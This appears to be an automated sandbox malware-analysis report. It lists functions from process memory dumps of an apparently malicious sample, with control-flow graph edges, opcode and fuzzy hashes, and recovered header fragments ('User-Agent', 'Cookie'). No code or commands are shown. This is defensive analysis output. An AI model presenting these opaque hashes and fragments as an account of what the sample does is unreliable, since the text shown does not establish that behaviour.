                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000024.00000002.2995653365.0000000002CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02CE0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_36_2_2ce0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction ID: 3ee16f02e74d8bd8a4ec344617e53e5b4fd9fda039ebeb63b1dc870c04456e41
                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction Fuzzy Hash: B84154B6500208BFEF125F65CC48BEEBFBAEF84704F154059EA45AB254D734D650CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 0064093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 64093e-64095f call 640cc4 call 6414bc call 643cc0 8 640967-640989 0->8 10 640af1-640af2 8->10 11 64098f-6409d2 call 6409d9 8->11 15 6409d4-6409d5 11->15 16 640a3d-640a80 11->16 17 6409d7-6409e8 call 643653 15->17 18 640a3c 15->18 21 640a82-640aae 16->21 22 640aec call 640af3 16->22 17->22 29 6409ee-640a10 17->29 18->16 21->22 27 640ab0-640abc 21->27 22->10 31 640ac1-640ae5 27->31 29->22 33 640a16-640a3b 29->33 31->10 37 640ae7-640aea 31->37 33->18 33->22 37->22 37->31
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000025.00000002.2991251621.0000000000640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_37_2_640000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction ID: e96d5dfb642c9f933cf46becb045495f296124ac6a1a4aa1d766a6f545733eca
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction Fuzzy Hash: E65190316443649FFB229F20CC85B9A77BDAF04744F040199BB49FE1D6DAB09A90CB69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 006414BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 38 6414bc-641590 call 6414de call 640c9c call 641345 * 6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000025.00000002.2991251621.0000000000640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_37_2_640000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                          • Instruction ID: 6573ae880ce0161380fb9c1b6aae23e10995215669779b09d42f28d1efaeccea
                                                                                                                                                                          • Opcode Fuzzy Hash: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                          • Instruction Fuzzy Hash: 552110724046149EDB43AF60C9C9CE773ECEF41704F45056AAD85EF04AFE709194CAEA
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00641345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 57 641345-641352 58 641358-64135e 57->58 59 6413eb-6413ec 57->59 58->59 60 641364-64137a 58->60 60->59 62 64137c-64138f 60->62 64 641391-641398 62->64 65 64139b-6413ab call 640e7c 64->65 68 6413ad-6413e2 65->68 68->59
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000025.00000002.2991251621.0000000000640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_37_2_640000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction ID: 7a2101c989d1b1898141e1eb61fb38314c1e52e2e73c42f065f688fbd617b946
                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction Fuzzy Hash: DE21C031904216AFDB129F78C844B9DBBB6AF05700F058255FD55BF694DB30ED10CB98
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 006414DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 69 6414de-641590 call 643653 call 640c9c call 641345 * 6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000025.00000002.2991251621.0000000000640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_37_2_640000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                          • Instruction ID: 3f75687f006cc48877240a879f33291702171f0dbe29d01ebe283df78b334527
                                                                                                                                                                          • Opcode Fuzzy Hash: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                          • Instruction Fuzzy Hash: AE119E724046149EEF43AF60C5C9CAA73ECEF40704B45096EAD85EF44EFE719194CAE9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00643F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 87 643f0d-643f29 call 643653 call 64379f 92 643f3b-643f66 call 643f78 * 3 87->92 93 643f2b-643f39 call 64401b 87->93 106 643f71 92->106 100 643f76-643f77 93->100 106->100 107 643f71 call 643f78 106->107 107->100
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000025.00000002.2991251621.0000000000640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_37_2_640000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                          • Instruction ID: 089a462d86bca6321db3cb6bf6a26995c9c66c8adab490ee7658d5e41774b051
                                                                                                                                                                          • Opcode Fuzzy Hash: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                          • Instruction Fuzzy Hash: A0F08C70988260AAFFC03FB08C4B74D36BAAF00705F040098BA89AD2D2CF3086548E79
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 00644674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 108 644674-64468d call 643a1c 111 64469d-6446cd 108->111 112 64468f-644698 call 643a6e 108->112 115 6447e7-6447ec 111->115 116 6446d3-6446f5 111->116 112->111 116->115 118 6446fb-644720 116->118 120 644722-644737 118->120 121 644738-64475a 118->121 120->121 123 64475c-64477e 121->123 124 6447bf-6447c9 121->124 123->124 129 644780-6447a2 123->129 125 6447e0-6447e5 124->125 126 6447cb-6447dd call 643673 124->126 125->115 126->125 129->124 132 6447a4-6447bc 129->132 132->124
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000025.00000002.2991251621.0000000000640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_37_2_640000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction ID: 1ffc37a2d9f181ca734d549b6a35934e533461e7e1f61f12657af0ea3e034972
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction Fuzzy Hash: B94165B6500208BFEF129F65CC84BDEBFBAFF84704F154069EA44AA254DB34DA41CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00644675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 133 644675-644680 134 64468b-64468d 133->134 135 644686 call 643a1c 133->135 136 64469d-6446cd 134->136 137 64468f-644698 call 643a6e 134->137 135->134 140 6447e7-6447ec 136->140 141 6446d3-6446f5 136->141 137->136 141->140 143 6446fb-644720 141->143 145 644722-644737 143->145 146 644738-64475a 143->146 145->146 148 64475c-64477e 146->148 149 6447bf-6447c9 146->149 148->149 154 644780-6447a2 148->154 150 6447e0-6447e5 149->150 151 6447cb-6447dd call 643673 149->151 150->140 151->150 154->149 157 6447a4-6447bc 154->157 157->149
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000025.00000002.2991251621.0000000000640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_37_2_640000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction ID: 12fb807f4fd22617bb7a008deae1056eeade87e16da79b29d8fd5e82daac965f
                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction Fuzzy Hash: 0C4184B6500208BFEF125F65CC49BDEBFBAFF80704F154069EA44AA254DB34DA40CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 006D093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 6d093e-6d095f call 6d0cc4 call 6d14bc call 6d3cc0 8 6d0967-6d0989 0->8 10 6d098f-6d09d2 call 6d09d9 8->10 11 6d0af1-6d0af2 8->11 15 6d0a3d-6d0a80 10->15 16 6d09d4-6d09d5 10->16 21 6d0aec call 6d0af3 15->21 22 6d0a82-6d0aae 15->22 17 6d0a3c 16->17 18 6d09d7-6d09e8 call 6d3653 16->18 17->15 18->21 29 6d09ee-6d0a10 18->29 21->11 22->21 27 6d0ab0-6d0abc 22->27 31 6d0ac1-6d0ae5 27->31 29->21 33 6d0a16-6d0a3b 29->33 31->11 37 6d0ae7-6d0aea 31->37 33->17 33->21 37->21 37->31
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000026.00000002.2991708002.00000000006D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_38_2_6d0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction ID: 494989da3fde10c1487aa86c210de388f75be9d0b6a81113bc0aa542d37bd79e
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction Fuzzy Hash: F551A131A443549FFB129F20CC85B997BBDAF04740F0801DABA45FE1D6DAB09A90CB69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 006D14BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 38 6d14bc-6d1590 call 6d14de call 6d0c9c call 6d1345 * 6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000026.00000002.2991708002.00000000006D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_38_2_6d0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                          • Instruction ID: a6c348583d3674c589305c0e444934590be920f5fac5dbc3b4a493394fd78151
                                                                                                                                                                          • Opcode Fuzzy Hash: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                          • Instruction Fuzzy Hash: 76211072804614AEDB43AF60C9C9CA773ECEF40704F45056BAD85EF04AFE749154CAEA
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 006D1345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 57 6d1345-6d1352 58 6d1358-6d135e 57->58 59 6d13eb-6d13ec 57->59 58->59 60 6d1364-6d137a 58->60 60->59 62 6d137c-6d138f 60->62 64 6d1391-6d1398 62->64 65 6d139b-6d13ab call 6d0e7c 64->65 68 6d13ad-6d13e2 65->68 68->59
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000026.00000002.2991708002.00000000006D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_38_2_6d0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction ID: 79fa92490a1b5b5183fa43e601cda26c51d823ac5f50d93a1aae4003c565d19a
                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction Fuzzy Hash: A121AE31904216AFDB119E78C844B9DBBB6AF05300F054216F955FF694DB70AD00CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 006D14DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 69 6d14de-6d1590 call 6d3653 call 6d0c9c call 6d1345 * 6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000026.00000002.2991708002.00000000006D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_38_2_6d0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                          • Instruction ID: 6caf88facb66cc6e8390f50a76d2dffd46f47a61754a21a88bd8169047cf72d9
                                                                                                                                                                          • Opcode Fuzzy Hash: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                          • Instruction Fuzzy Hash: 0911EF72804614AEEF43AF20C5C8CAA73ECEF40704B45096FAD85EF54AFE719154CAE9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 006D3F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 87 6d3f0d-6d3f29 call 6d3653 call 6d379f 92 6d3f3b-6d3f66 call 6d3f78 * 3 87->92 93 6d3f2b-6d3f39 call 6d401b 87->93 106 6d3f71 92->106 101 6d3f76-6d3f77 93->101 106->101 107 6d3f71 call 6d3f78 106->107 107->101
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000026.00000002.2991708002.00000000006D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_38_2_6d0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                          • Instruction ID: 0e589a3b04657eee8c8df0e79da85aae84673deab581ec01fb087b2c4530b02c
                                                                                                                                                                          • Opcode Fuzzy Hash: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                          • Instruction Fuzzy Hash: 3CF012B0D88264A7EF803F708C4B65936B55F40706F040996FA49AD3D6DE7086509E7A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 006D4675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 133 6d4675-6d468d call 6d3a1c 136 6d469d-6d46cd 133->136 137 6d468f-6d4698 call 6d3a6e 133->137 140 6d47e7-6d47ec 136->140 141 6d46d3-6d46f5 136->141 137->136 141->140 143 6d46fb-6d4720 141->143 145 6d4738-6d475a 143->145 146 6d4722-6d4737 143->146 148 6d475c-6d477e 145->148 149 6d47bf-6d47c9 145->149 146->145 148->149 154 6d4780-6d47a2 148->154 150 6d47cb-6d47dd call 6d3673 149->150 151 6d47e0-6d47e5 149->151 150->151 151->140 154->149 157 6d47a4-6d47bc 154->157 157->149
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000026.00000002.2991708002.00000000006D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_38_2_6d0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction ID: f03a73a6d16f6a6e2c8e5f9b7fc5f485270921d9deee4251ce86b32813dd64b2
                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction Fuzzy Hash: 094166B6900208BFEF125F65CC48BDEBFBAEF84704F154069EA44AA354DB34DA50CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 006D4674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 108 6d4674-6d4680 109 6d468b-6d468d 108->109 110 6d4686 call 6d3a1c 108->110 111 6d469d-6d46cd 109->111 112 6d468f-6d4698 call 6d3a6e 109->112 110->109 115 6d47e7-6d47ec 111->115 116 6d46d3-6d46f5 111->116 112->111 116->115 118 6d46fb-6d4720 116->118 120 6d4738-6d475a 118->120 121 6d4722-6d4737 118->121 123 6d475c-6d477e 120->123 124 6d47bf-6d47c9 120->124 121->120 123->124 129 6d4780-6d47a2 123->129 125 6d47cb-6d47dd call 6d3673 124->125 126 6d47e0-6d47e5 124->126 125->126 126->115 129->124 132 6d47a4-6d47bc 129->132 132->124
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000026.00000002.2991708002.00000000006D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_38_2_6d0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction ID: 40a0643fcd8f3225370fe917a06f2e0fee5c5326b2571c4c4786c97b307fc593
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction Fuzzy Hash: 374154B6900208BFEF125F65CC44BDEBBBAEF84704F154069EA44AA354DB34DA40CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 02EF093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 2ef093e-2ef095f call 2ef0cc4 call 2ef14bc call 2ef3cc0 8 2ef0967-2ef0989 0->8 10 2ef098f-2ef09d2 call 2ef09d9 8->10 11 2ef0af1-2ef0af2 8->11 15 2ef0a3d-2ef0a76 10->15 16 2ef09d4-2ef09d5 10->16 17 2ef0a7e-2ef0a80 15->17 18 2ef0a3c 16->18 19 2ef09d7-2ef09e8 call 2ef3653 16->19 21 2ef0aec call 2ef0af3 17->21 22 2ef0a82-2ef0aae 17->22 18->15 19->21 30 2ef09ee-2ef0a10 19->30 21->11 22->21 27 2ef0ab0-2ef0abc 22->27 31 2ef0ac1-2ef0ae5 27->31 30->21 34 2ef0a16-2ef0a3b 30->34 31->11 37 2ef0ae7-2ef0aea 31->37 34->21 38 2ef0a41-2ef0a76 34->38 37->21 37->31 38->17
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000027.00000002.2995166100.0000000002EF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_39_2_2ef0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction ID: 1d9df5712705a71680ada817e241050509a19bcfee6f2e5caed69e1bfb53d6a5
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction Fuzzy Hash: C5518F316843549FEF239F20CC85B9A77B8AF04744F0441D9BB49FE0DADBB09694CA65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02EF14BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 39 2ef14bc-2ef1590 call 2ef14de call 2ef0c9c call 2ef1345 * 6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000027.00000002.2995166100.0000000002EF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_39_2_2ef0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                          • Instruction ID: ae3e51a2ef55aba47c9c7425bbb94c82f410adc5aeac748bf26aaa8b48717d85
                                                                                                                                                                          • Opcode Fuzzy Hash: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                          • Instruction Fuzzy Hash: 6E210C724056189EDF43AF60C9C8CA677ECEF40704F45496AAE89EF049FA709154CEE6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02EF1345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                          Download Yara Rule

